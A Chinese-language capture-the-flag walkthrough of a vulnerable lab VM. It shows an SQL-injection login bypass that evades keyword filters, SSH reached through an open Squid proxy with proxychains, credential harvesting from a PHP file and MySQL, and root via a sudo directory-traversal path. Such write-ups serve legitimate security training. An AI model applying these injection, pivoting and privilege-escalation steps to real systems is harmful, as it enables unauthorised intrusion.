文章目录
一、基础信息
Kali IP:192.168.20.146
靶机IP:192.168.20.149
二、信息收集
端口扫描
nmap -sS -sV -p- -A 192.168.20.149
开放了22、80、3128等端口
80:apache httpd 2.2.22
3128:squid 3.1.20
访问一下80页面,后台php语言,版本5.4.4
目录扫描
80页面目录扫描没有发现
3128端口扫描也没发现
三、漏洞探测
只能先从80登录页面入手,直接抓包sqlmap梭哈,发现注入不出
尝试手工测试,发现有很多过滤,过滤了or,=,group,union,select,and,逗号等等,email与password参数均为单引号闭合
还是先尝试万能密码,or与and过滤可以用&&或者||绕过,=过滤可以用like
Payload=' || 'a' like 'a
得到了邮箱信息,以及账户密码:john/hereisjohn
参考其他wp,也可以用常用注入语句进行测试。
https://github.com/melbinkm/SQL-Injection-Payloads/blob/master/sqli_auth.list
intruder进行sql注入爆破,选择email和password参数,攻击类型设置:pitchfork
同样注入成功,但是有点不太理解为什么会成功。
四、ssh登录
现在有了账号密码信息,尝试ssh登录但是没有成功,端口状态为filtered
尝试从3128端口寻找突破口,页面提示信息squid 3.1.20
查了一下,Squid是一套代理服务器和Web缓存服务器软件,提供缓存万维网、过滤流量、代理上网等功能。
查到两个漏洞信息,一个缓冲区溢出,一个拒绝服务攻击,尝试了一下没有结果
想到squid提供的代理服务,尝试设置代理访问
proxychains使用参考https://zhuanlan.zhihu.com/p/166375631
vim /etc/proxychains4.conf
http 192.168.20.149 3128
通过代理,连接ssh
proxychains ssh john@192.168.20.149 -t "/bin/sh"
五、提权
Sudo提权:提示没有
Suid位提权:没有发现
到辅助网站查询命令:https://gtfobins.github.io/
内核提权:Uname -a;cat /etc/*release
版本漏洞搜索后没有利用成功,继续尝试其他方式
计划任务:没有发现
查看定时任务
find /etc/*cron* -type f -ls 2>/dev/null
查看定时任务内容
find /etc/*cron* -type f -ls 2>/dev/null -exec cat {} \; > /tmp/cron.txt
grep '\*' /tmp/cron.txt
/var/spool/cron下没有查看权限
似乎当前账号没找到好的提权方式,继续做一下信息收集
在网站根目录/var/www下的login.php文件中发现数据库账户密码
mysql -u root -proot
在数据库中查到用户登录信息
use SkyTech;
select * from login;
账户信息:
sara/ihatethisjob
William/senseable //提示密码不对,无法登录
登录到sara账户尝试提权,发现有sudo命令可利用
但是指定路径/accounts下没有任何文件,Suid位也没有可利用信息
但是看了wp发现这里可以用目录遍历的形势查看文件
查看目录下有哪些文件
sudo ls /accounts/../
sudo ls /accounts/../root
查看 flag 文件
sudo cat /accounts/../root/flag.txt
得到root账户密码theskytower
切换到root即可,提权成功。
